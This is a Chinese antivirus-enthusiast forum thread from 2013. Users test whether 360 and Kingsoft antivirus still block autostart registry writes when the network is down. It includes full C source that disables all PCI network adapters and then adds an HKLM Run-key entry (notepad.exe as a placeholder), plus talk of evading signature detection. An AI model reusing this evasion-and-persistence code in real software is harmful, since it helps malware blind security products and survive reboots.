无驱动一句代码过金山毒霸启动（无拦截）续集

显示全部楼层 · 发表于 2013-8-23 09:44:57

kfz24 发表于 2013-8-22 23:28
人家标准的vc程序。
看来职业免杀专家也有走眼的时候啊。

哎，不要这么称呼，不敢当。

我运行他的程序的时候看到批处理的黑框了，
我还是比较相信vm001的话，“批处理来测试本来就能断网防御”
所以我觉得他要写个不调用批处理的来测试，才能有力的辩驳这句话。

显示全部楼层 · 发表于 2013-8-23 11:01:11

peter08 发表于 2013-8-22 23:14
你这还是个批处理吧。弄个纯EXE试试。

就是C语言写的纯exe。

显示全部楼层 · 发表于 2013-8-23 11:07:49

本帖最后由 myzuzong 于 2013-8-23 12:26 编辑

peter08 发表于 2013-8-23 09:44
哎，不要这么称呼，不敢当。

我运行他的程序的时候看到批处理的黑框了，

黑框是因为这是控制台程序。

绝非调用批处理，也不是调用CMD命令，纯win32 api操作。相信应该有说服力。（其实批处理也不能断网防御。）

显示全部楼层 · 发表于 2013-8-23 12:41:06

myzuzong 发表于 2013-8-23 11:07
黑框是因为这是控制台程序。

绝非调用批处理，也不是调用CMD命令，纯win32 api操作。相信应该有说服 ...

（其实批处理也不能断网防御。）
你说的是金山吧，我在说360.

19楼你拿出来一个程序，想证明360在断网情况下能够防御注册表的写入，
然后vm001反驳你，说你是用批处理写入的注册表，所以360在断网情况下才能够防御。

这里我有点偏向vm001的说法，是因为批处理360才能够拦截注册表写入的，
然后你的19楼程序，按照你说的，你没有调用cmd，但是我在运行的时候，看到了一个
（cnhost.exe？好像是这个？）的进程，在这里，把vm001的话扩大一下，
凡是rundll32.exe cmd.exe 以及你的控制台那个进程写入注册表，在断网下都会遭到360的拦截，
这是360的一个断网下的防御机制，显然金山没有，所以才有此贴。

但是我这里想希望你做的是，写一个纯的EXE，就这个EXE来写注册表，在断网的情况下，我觉得360是不会拦截的，不要调用控制台，不要调用一些被360不信任的系统程序来写注册表，看看断网情况下会不会拦截，
而且要注意云缓存，以及不被特征码给秒了之类的。

以上只是我的想法，希望得到论证。

显示全部楼层 · 发表于 2013-8-23 12:58:29

本帖最后由 myzuzong 于 2013-8-23 13:22 编辑

peter08 发表于 2013-8-23 12:41
（其实批处理也不能断网防御。）
你说的是金山吧，我在说360.

不是的，360在断网下不能防御，不论是批处理还是调用cmd。vm001乱说的，你自己测试一下就知道了。你先断网，再运行我的程序，绝不拦截。你先联网，再运行我的程序，由我的程序自动断网，绝对要拦截。

我的程序已修改，现在是自动断网。另外我这就是纯api的纯vc程序，跟cmd毫无关系。不信可见下面源代码。

// Test.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <Setupapi.h>
#include <objbase.h>

#pragma comment(lib, "setupapi")

void EnumDevices(HDEVINFO hDevInfo)
{
SP_DEVINFO_DATA DeviceInfoData = {sizeof(SP_DEVINFO_DATA)};
LPOLESTR guid;
wchar_t devName[128];
wchar_t instanceId[128];
for(int i=0; SetupDiEnumDeviceInfo(hDevInfo, i, &DeviceInfoData); i++)
{
StringFromCLSID(DeviceInfoData.ClassGuid,
&guid);
SetupDiClassNameFromGuid(&DeviceInfoData.ClassGuid,
   devName,
   128,
   NULL);
if(!wcscmp(devName,
   L"Net"))
{
SetupDiGetDeviceInstanceId(hDevInfo,
   &DeviceInfoData,
   instanceId,
   128,
   NULL);
if(!wcsncmp(instanceId,
L"PCI",
3))
{
SP_PROPCHANGE_PARAMS params = {sizeof(SP_CLASSINSTALL_HEADER)};
params.ClassInstallHeader.InstallFunction = DIF_PROPERTYCHANGE;
params.Scope = DICS_FLAG_CONFIGSPECIFIC;
params.StateChange = DICS_DISABLE;
params.HwProfile = 0;
SetupDiSetClassInstallParams(hDevInfo,
   &DeviceInfoData,
   (SP_CLASSINSTALL_HEADER *)&params,
   sizeof(SP_PROPCHANGE_PARAMS));
SetupDiChangeState(hDevInfo,
   &DeviceInfoData);
}
}
CoTaskMemFree(guid);
}
}

int _tmain(int argc, _TCHAR* argv[])
{
HDEVINFO hDevInfo = INVALID_HANDLE_VALUE;
hDevInfo = SetupDiGetClassDevs(NULL,
   NULL,
   NULL,
   DIGCF_PRESENT | DIGCF_ALLCLASSES);

if(INVALID_HANDLE_VALUE == hDevInfo)
return GetLastError();
EnumDevices(hDevInfo);
SetupDiDestroyDeviceInfoList(hDevInfo);

HKEY hkRun;
wchar_t *lpData = L"C:\\Windows\\System32\\notepad.exe";
if(ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,
L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0,
KEY_ALL_ACCESS,
&hkRun))
{
RegSetValueEx(hkRun,
L"Test",
0,
REG_SZ,
(const BYTE *)lpData,
(lstrlen(lpData)+1)*sizeof(wchar_t));
}
RegCloseKey(hkRun);
return 0;
}

显示全部楼层 · 发表于 2013-8-23 13:07:06

本帖最后由 myzuzong 于 2013-8-23 13:09 编辑

peter08 发表于 2013-8-23 12:41
（其实批处理也不能断网防御。）
你说的是金山吧，我在说360.

另外我测试了，金山也能抗断网。程序自动断网后，该程序后续行为仍然能被拦截，跟360一致。前文对金山有错误的认识，抱歉。用我19楼的程序测试即可。

显示全部楼层 · 发表于 2013-8-23 13:07:08

我又发现了一个金山毒霸的问题经过测试4.0版本完美成功晚上测试一下4.6的版本如果也有这个问题的话我就发出来给大家分享
这次是不用断开网络的哦

显示全部楼层 · 发表于 2013-8-23 13:10:16

myzuzong 发表于 2013-8-23 13:07
另外我测试了，金山也能抗断网。程序自动断网后，该程序后续行为仍然能被拦截，跟360一致。前文对金山有 ...

嗯，这个金山和360都不是100% 能保证这种防御的成功率的，其实就是一个缓存，没有介绍的那么玄乎

显示全部楼层 · 发表于 2013-8-23 13:10:34

vm001 发表于 2013-8-22 22:17
给你个事实吧就知道断网怎么回事了
http://bbs.kafan.cn/thread-1614663-1-1.html
帖子我锁了，所以给你 ...

请看31L。

显示全部楼层 · 发表于 2013-8-23 13:11:22

vm001 发表于 2013-8-23 13:10
嗯，这个金山和360都不是100% 能保证这种防御的成功率的，其实就是一个缓存，没有介绍的那么玄乎

应不是“云缓存”，因为第一次运行这个程序，断网后仍能拦截。

[金山] 无驱动一句代码过金山毒霸启动（无拦截）续集